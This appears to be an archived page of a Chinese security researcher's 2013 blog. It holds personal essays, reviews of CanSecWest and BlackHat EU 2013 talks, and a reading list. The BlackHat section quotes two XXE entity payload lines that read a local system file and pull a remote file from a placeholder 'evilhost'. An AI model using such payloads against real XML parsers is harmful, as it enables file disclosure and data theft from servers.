• 八月随笔

    日期:2013-08-16 | 分类:随笔杂谈

    最近有些朋友反馈博客已经近一个月没更新,这里出来冒泡一下,博客会持续更新的,不会突然停止更新的,而且会继续吹吹水、聊聊技术的。

    至blogbus改版后,速度确实提高了不少,界面也很简洁好看了,赞一个先。

    之前为了方便,下特地下了手机版blogbus应用,准备用手机偶而发下博客,不过下载下来还一直没写过,留着下次吧,也许在某次坐地铁的时候就突然来兴致更新了下。

    近来也很少发原创微博,只是经常翻看而已,现在一般都是发在微信的朋友圈了。

    还有,再炫耀下,最近拿了几件T恤,TSRC、Freebuf和魔兽世界的T恤,再也不用穿着破衣服上班了,刚才把衣服扔进洗衣机了,不然应该拍照炫一下,哈哈……

  • 曾经奋斗的日子

    日期:2013-07-21 | 分类:随笔杂谈

    晚上y32asm发了张当年博客的截图过来,瞬间回想起很多事情:

    上图是y32asm大学时照的,我很早之前也看了这本书,而且看了不止一遍,甚至试图将其偷出来,可惜没成功,之前忘记拍张照留恋了。期末考结束之后,我甚至拿着这本书去自习,估计这也是多数同学无法理解的,当个人业余兴趣远超出对学业的兴趣,相信多数人也会与我一样。

    最初看这本书的目的其实很简单,就是为了看懂《网络渗透技术》这本书,但看完之后,发现我还是看不懂。

    以前回校去图书馆,总会拿出这本书摸摸,回味曾经的往事。

    这本书对自己而言,是一大转折点,也是学习系统底层的开始,看完这本书,很多IT书都能够看懂了。

    在新校区三年半,有三年是在图书馆度过的(前半年图书馆还没建成),经常连续一两月每天都去图书馆看书,也基本没有午休,吃完饭就去图书馆了,有时也翘课去。现在也很少午休,但那都是为了打游戏了,呵呵……

    大学图书馆,一个曾经孤独奋斗的地方,有机会,一定再回去摸下那本《深入理解计算机系统》!

  • 端午随笔

    日期:2013-06-11 | 分类:随笔杂谈

    6月,枙子花开毕业时,有人欢笑,有人哭……

    高考填志愿、大学毕业找工作,人生转折点正逐步逼近!

    曾经奋斗的梦想、吹过的牛逼也许已被素质教育催残殆尽,但永远不要忘记自己心中最原始的声音。

    坚信,念念不忘,必有回响!

     

  • 龋齿

    日期:2013-05-11 | 分类:随笔杂谈

    很早之前就发现有龋齿了,只是没疼痛感,就一直没去管它。这周开始感觉有点痛了,连腮部都觉得有点不舒服,真的是“小洞不补,大洞叫苦”,这种事还是得趁早啊。不然伤及底部神经,还得做根管治疗啥的,更麻烦,之前一同事做根管治疗,一颗牙花了2千大洋。

    在医院看病挂号也是个麻烦事,没大清早去排队的基本都没戏,打算明天去南山医院看看牙科,估计得六点多过去了。

    近两年没去过医院了,没想到这次是因为牙痛才要去的。

  • 近期感言,顺祝五一快乐

    日期:2013-04-29 | 分类:随笔杂谈

    这个月博客少更新了,临近月底,上来吐槽下……

    1、这个月在安全界也发生了不少事件,而且是越来越娱乐,包括58招聘事件,以及各种微博事件。随着社交网络的普及化,各种八卦事件,互斥事件传播得更快了。58那事,后面还出现各种58站被黑,正如is所说的:黑58的人工资都是没上8k的。总之,贵圈越来越乱了!

    2、甲方漏洞平台的出现已成趋势,从骂TX平台开始,到骂WY,现在又开始骂JD;白帽子的利益追求在扩大化,这也使得白帽子在报告漏洞的同时能够得到一定的经济补偿,这也使得更多的人追求和推崇“no more free bug”,但这也使得这个圈越来越浮燥,不外乎追名逐利,为漏洞评分、为漏洞感谢、为实物奖励,稍有分歧,就刀戈相向,口水乱喷,使得原本现实中是朋友的人,在微博、博客等社交平台互骂,更加地体现出某些人的本质。以前也曾对这些东西心动过,但见多了也就释怀,只有不为所动,方能客观看待!有利益的地方,就会有冲突。还是那句话,贵圈越来越乱了!

    3、安全技术文章越来越多是通过长微博或者微信来推送,交互性更强了,信息也越来越快餐化,但同时也帮忙我们更快地获取业界信息。另,这也导致越来越少人写博客了,论坛互动交流减少了,像看雪开发android程序,将论坛搬到手机上就是个不错的应对方案。各种微信分享、长微博的大量信息传递,确实有点视觉疲劳了,之前还特意取消某些微信帐号关注。

    4、在当前快餐信息的冲击下,又有几人保持阅读学习的习惯呢?这里的阅读并不局限于书本,还包括业界各类paper,通过RSS阅读获取这方面的信息是最好的方式。虽然7月份google阅读就停止服务了,但可以用 The Old Reader代替下,支持翻墙的。最近自己也买了好多本书,大多是非技术类的,不过就看了两本,得抓紧时间了。

    5、安全技术就是一把双刃剑,剑在手,可杀戮,可起舞,全凭个人的信仰。

    6、保证业务的安全,一半是靠自家的本事,一半是道上的兄弟给的面子!

    7、技术精诚,止于至善,恰如逆水行舟,不进则退。三四个月不学习,就可能被淘汰之。

    8、之前instruder在群里问大家如何评价一个人的天赋,鄙人答之:在无任何任务相关的技术知识背景下,通过自学完成任务的快捷度。

    9、对于攻城师,别只学习技术,心理、哲学、交际、文学、艺术等更偏向于文科的东西,不妨多涉猎,因为生活需要它们。

    10、最后我想说的是:朗科食堂的饭菜越来越难吃了!

  • 关于CanSecWest 2013大会

    日期:2013-03-23 | 分类:随笔杂谈

     

    文档下载:http://cansecwest.com/csw13archive.html

     

    此次CanSecWest 2013大会的质量明显要高出BlackHat EU 2013很多,主要还是软件/系统安全为主,涉及漏洞利用和挖掘等技术。

     

    1、《Fuzzing for logic and state issues》

     

    Peach Fuzzer框架的作者写的,主要是介绍peach3的新增特性,增加逻辑漏洞和无效的状态转换等问题,比如一些WEB认证的逻辑漏洞,PPT写得比较简洁,纯文字描述,不好完整理解,建议还是上官网看peach3的使用文档吧:http://peachfuzzer.com/v3/PeachPit.html,上个月作者刚更新的,写得比较详细。

     

    2、《DEP ASLR bypass without ROP JIT》

     

    绿盟的TK讲的,里面的思路最早是在2009年的中国软件安全峰会《Vulnerability: The next 10 years》中提到的,主要是利用 SharedUserData 地址 0x7ffe0000 在win上是固定不变的,再通过它找到SystemCall,然后设置其参数,来调用指定的系统函数。在安全峰会上,作者是调用NtUserLockWorkStation这一函数来设置锁屏,而在此次CSW大会上,作者是通过LdrHotPatchRoutine索引到LdrLoadDll来加载外部的DLL,实现任意代码执行,这种方法只工作在winx64上的32位程序,且在win8上微软已经修复此问题。

     

    3、《Adobe Sandbox WHEN THE BROKER IS BROKEN》

     

    exploit系列教程的作者peter写的议题,在以前的一些大会上,也有人做过关于adobe sandbox的分享,但总觉得PPT写得不过详细,这次peter的议题,我觉得写得挺详细的,由浅入深,从介绍沙盒的相关术语、client与broker之间的通讯原理开始讲起,并提起一些沙盒逃逸的攻击面,分析和提取cross call函数等信息,同时也提供一些demo,可惜只有ppt,要是能提供paper和code就更好了。

     

    4、《An Android Hacker's Journey- Challenges in Android Security Research》

     

    对我而言,里面让我最感兴趣的是作者即将出版的《Android Hacker's Handbook》这个系列的书都很经典,包括shellcode、web、macosx以及ios等书,都是相当经典的,上面4本除了ios那书只看了一小部分之外,其它3本我都详细阅读过,值得推荐,前两本国内早有中译本了。

    这个议题里面讲了一些android软件漏洞,包括一些组件权限设置问题导致的信息泄露,以及linux内核漏洞,其中还有一张赛门铁克提供的移动设备威胁图表,列出了移动设备可能面临的各种安全威胁,做得挺不错的。最后讲述了一些android平台的调试技巧,包括远程调试、源码调试等,有兴趣的朋友可以看下。

     

    5、《Assessing the Linux Desktop's Security》

     

    感觉一般,对这议题也不是很感兴趣。

     

    6、《MS SQL Post Exploitation Shenanigans: You're In, Now What?》

     

    讲述 MS SQL Server 利用技术,主要是利用扩展存储过程API来利用MSSQL,包括获取密码hash,内存搜索hash替换,编写poc创建后门,以及利用msf来控制shell等方式。在实际的渗透测试中,相信大多数的企业还是会选择使用php + mysql,特别是近些年来,这一组合的比例一直在扩大,所以估计对此文感兴趣的人不会太多。

     

    7、《Cracking and Analyzing Apple iCloud backups, Find My iPhone, Document Storage》

     

    基本就是在讲苹果的icloud服务及其原理,跟安全相关的内容不多,爱看不看。

     

    8、《UPnP Vulnerabilities》

     

    PPT写得很是简单,内容也不是感兴趣,爱看不看。

     

    9、《Analysis of a Windows Kernel Vulnerability》

     

    共有273页,这是我见过最长的PPT文档。主要讲Duqu病毒所使用的 CVE-2011-3402:Windows win32k.sys TrueType 字体解析数组越界漏洞,从TTF字体格式开始分析,解释漏洞成因,以及漏洞的利用技术。在去年的syscan大会上,360的人也针对此漏洞分析过其原理及利用技术,可以交互参考阅读。国内最早分析并公开细节的应该是启明星辰,其在博客上也帖出了相应的分析文章,看雪和binvul论坛均有人发表相关的漏洞分析文章。

     

    10、《iOS 6 Exploitation 280 Days Later》

     

    作者之前搞了近10年的WEB安全,2010年中才开始搞iphone安全,但他98年就开始接触安全,也算是安全界的老一辈革命家了。讲了2012年之后出现过的一些ios漏洞,以及关于ios安全相关的资料和书籍,同时介绍苹果对此采取的一些保护机制(cookie、ASLR、程序目录权限限制……),大部分篇幅还是在介绍ios的保护机制。

     

    11、《Evil Maid Just Got Angrier:Why Full-Disk Encryption With TPM is Insecure on Many Systems》

     

    讲述关于bios那些底层的东东,看不懂,真心看不懂!

     

    12、《Physical Privilege Escalation and Mitigation in the x86 World》

     

    硬件hacking一类的议题,PPT也大多是贴图,不好理解,反正是没看懂这PPT

     

    13、《Smart TV Security》

     

    一个有趣的议题,主要讲关于智能电视安全,包括智能电视机上面的app漏洞,以及恶意app感染、网络通讯安全等问题,同时还介绍智能电视固件rootkit的开发,如何留取后门。控制智能电视后最大的风险就是用它来监控和窃听你的行为,因为智能电视都配有摄像头。最后,还介绍一些调试等逆向相关技术,以及操作电视的一些API函数。

     

    14、《The Evolution of BlackHole》

     

    总觉得这是BlackHol exploit kit的广告帖,介绍BlackHole这一漏洞利用工具包的一些功能,一套售价冒似是1500美元,不过里面的一些功能看起来还是不错的。

     

  • 关于BlackHat EU 2013大会

    日期:2013-03-20 | 分类:随笔杂谈

     

    大会文档下载:https://www.blackhat.com/eu-13/archives.html

    此次BH EU 议题整体较水,涉及系统安全、移动安全、网络传输安全、WEB安全、游戏安全等。下面随便挑几个议题简单介绍下,有些议题不是很感兴趣,有些也特水,有兴趣的自己到上面链接下载文档。

     

    1、《A PERFECT CRIME? ONLY TIME WILL TELL》

     

    讲述SSL攻击方法——CRIME,如何从SSL加密的会话中获取到cookie,CRIME原理就是通过在受害者的浏览器中运行JavaScript代码并同时监口斤HTTPS传输数据,进而解密会话Cookie,也算是中间人攻击MIMT的一种方法。该议题对CRIME方法进行扩展,介绍一种叫TIME (Timing Info-leak MadeEasy)的攻击手法,基于传输时间来猜测payload size,然后逐字猜解cookie。

     

    2、《ADVANCED HEAP MANIPULATION IN WINDOWS 8》

     

    介绍常堆及内核溢出利用技巧,以及在win8上改进后的内存安全保护机制。里面构造堆内存布局的exploit技巧,与以往利用信息泄露获取dll基址来绕过ASLR方法有些类似,都通过分配特定大小的堆块,然后释放出与造成溢出的堆块大小相同的堆块,触发漏洞后覆盖到特定结构。同时,介绍了内核中的堆块分配与释放的原理,然后讲述不同大小的堆块溢出后,如何构造相应的堆布局来实现利用。最后,以windows object内核漏洞为例,讲述win7\win8上的exploit技巧,在wihte paper中已给出相应的exploit代码。

     

    3、《THE DEPUTIES ARE STILL CONFUSED》

     

    总之,这议题很水,爱看不看。主要讲CSRF和点击劫持clickjacking的攻击技巧,里面也提到前段时间facebook爆出的OAuth2认证漏洞,点击劫持就讲下beef的clickjacking模块,然后提下防御点击劫持的x-frame-options,

     

    4、《Hacking Appliances: Ironic exploits in security products》

     

    初看这标题,还以为是讲客户端软件漏洞利用呢,其实主要还是讲WEB安全的多一些,觉得有点水。

     

    5、《HACKING VIDEO CONFERENCING SYSTEMS》

     

    比较有趣的一个议题,主要讲述如何攻击语音会议系统,介绍了root提权以及远程调试的一些技巧,最后演示了一个后门shell。对这些不是很了解,有兴趣的自己看文档。

     

    6、《Hardening your Windows 8 apps for the Windows Store》

     

    很水,不解释

     

    7、《Harnessing GP²Us Building Better Browser Based Botnets》

     

    觉得这议题有点在玩概念,实际攻击场景或者实战的东西很少,太理论化了。GPU现在很多被用在暴力crack方面,比如跑MD5、跑WPA-PSK,速度比CPU快得N多,比五速鞋还五速鞋……该议题主要讲构造基于浏览器的僵尸网络botnet,利用WEB漏洞(如XSS,并提到利用html5的WEB存储特性、插件等等方法实现永久XSS)来执行代码,再用GPU跑数据,然后利用C&C服务器进行通讯。

     

    8、《LET'S PLAY - APPLANTING》

     

    很水,为什么这种也能上BH大会讲呢

     

    9、《MULTIPLAYER ONLINE GAMES INSECURITY》

     

    讲游戏漏洞相关的,主要涉及协议分析、常见客户端漏洞攻击等,没什么新鲜的东西,爱看不看。

     

    10、《Next generation mobile rootkits》

     

    相对比较前沿的东西,主要讲arm平台上的rookit设计,但PPT写得太简洁了,简单一些文本描述,很难完全理解其中意思。之前viaForensics也写一篇关于android rootkit的文档《Dude,where’s my droid?!》,发表于RootedCON 2013安全大会,推荐阅读。

     

    11、《POWER ANALYSIS ATTACKS FOR CHEAPSKATES》

     

    可能一些搞硬件hacking或者移动安全的朋友会感兴趣,应该属于边信道攻击一类,玩这种都需要花钱买设备,所以搞这些的一般都是高富帅,像kevin2600一样。

     

    12、《XML Out-Of-Band Data Retrieval》

     

    这种XML实体注入漏洞,在2011年的时候,80sec就有写过一篇文章提到《XML实体注入漏洞安全警告》http://www.80sec.com/xml-entity-injection.html,比如可用于读取文件,加载远程页面:

    <!ENTITY % payload SYSTEM "file:///c:/boot.ini">
    <!ENTITY % remote SYSTEM "http://evilhost/evil.xml">

    漏洞实例见《zend framework文件读取漏洞分析》:http://zone.wooyun.org/content/508,这次老外还是落后了些啊!

     

    13、《Advanced iOS Application Pentesting》

     

    看标题冒似很“高级”的样子,实则就介绍下ios的一些逆向工具和ios编程中用到的一些类而已,还是爱看不看。

     

    14、《APPLICATION DEVELOPMENT SECURE CODING WORKSHOP》

     

    主要讲WEB开发中安全编程,但主要就是在普及WEB安全漏洞的原理、防御等,包括XSS、注入、CSRF等等,算是总结性文章,没有新货,有兴趣的自个翻看下。

     

    15、《Assessing BYOD with the Smarthpone Pentest Framework》

     

    作者公布了一款智能机渗透测试框架——Smartphone Pentest Framework v0.1.5,包括一些浏览器漏洞、客户端漏洞、社会工程学漏洞以及本地提权等,利用漏洞获取shell后还可发送短信、获取通信录、短信、下载上传文件等,有些功能还是不错的,但漏洞利用方法相对单一,有其利用的局限性。该工具下载地址:

    https://github.com/georgiaw/Smartphone-Pentest-Framework 

     

     

  • 明天开始上班

    日期:2013-02-16 | 分类:随笔杂谈

    春节假期很快就结束了,之前还以为是放假到初八呢,因为之前只记住新历,没注意到对应的农历时间,还好车票没买错,明天开始正式上班了……

    新年新气象,搞起!!!

  • 启程回家

    日期:2013-02-07 | 分类:随笔杂谈

    终于要放假了,收拾下行李,准备启程回家,不过今天还得再上一天班,坐的是晚上的飞机,第2天还得再坐汽车回去,预祝各位朋友新春快乐!

    刚看到另一则消息:原《软件调试》作者张银奎又要出新书了,书名为《格蠹汇编——软件调试案例集锦》,据说已完稿,具体见:http://advdbg.org/blogs/advdbg_system/articles/5521.aspx

    其封面基本与软件调试一样,均是天师钟馗,预计3月份出版。

  • 骐骥一跃,不能十步,驽马十驾,功在不舍,为成为像泉哥一样的好人而努力读书。     

                                                                                                          —— 泉哥

     

    修身篇

     

    1、《FBI 教你超级读心术》(已阅)

    2、《遇见未知的自己》(已阅,不推荐)

    3、《少有人走的路:心智成熟的旅程》(已阅,强烈推荐)

    4、《一万小时天才理论》(远不如《异类》一书,内容着实不行,或者被译者搞成这样的)

    5、《少有人走的路2:勇敢地面对谎言》(已阅,强烈推荐这个系列,主要是讲一些心理疾病案例) 

    6、《少有人走的路3:与心灵对话》(已阅,感觉还是第一本写得最精彩)  

    7、《少有人走的路4:心灵地图》(已阅)

    8、《书法举要》(已阅)

    9、《影响力》(已阅,推荐)

    10、《说服力》(已阅)

    11、《本色》(已阅)

     

    学习篇

     

    1、《BSD rootkit 设计——内核黑客指引书》(已阅,元旦一天看完,算是*nix版的rootkit教程)

    2、《软件调试》(推荐,其中关于堆的章节写得很详细,特别对分析堆漏洞很有帮助,目前也是跳跃章节翻看)

    3、《Android软件安全与逆向分析》(已阅)

    4、《黑客攻防技术宝典:iOS实战篇》(已阅)

    5、《内核漏洞的利用与防范》(选择性地阅读部分章节)

    6、《黑客》(看了前面几章,也是看不下去了)

    7、《掘金黑客》(看了1/3,实在太无聊了,真心看不下去,以后还是少买这种黑客小说类书籍)

    8、《WEB之困:现代WEB应用安全指南》(已阅,未达到预期,也谈不上圣经著作)

    9、《灰帽黑客:正义黑客的道德规范、渗透测试、攻击方法和漏洞分析技术(第3版)》(挺全面的一本书,推荐阅读)
    10、《C++反汇编与逆向分析技术揭秘》(阅读主要章节,其中C++反汇编后半部分写得挺深入详细的,推荐阅读 )
    11、《大话企业级Android开发》(已阅)
    12、《Web前端黑客技术揭秘》(已阅)
    13、《Android 安全机制解析与应用实践》(很烂的一本书,wiki、google一类的)
    14、《蛇(虫)伤自救彩色图解》(已阅)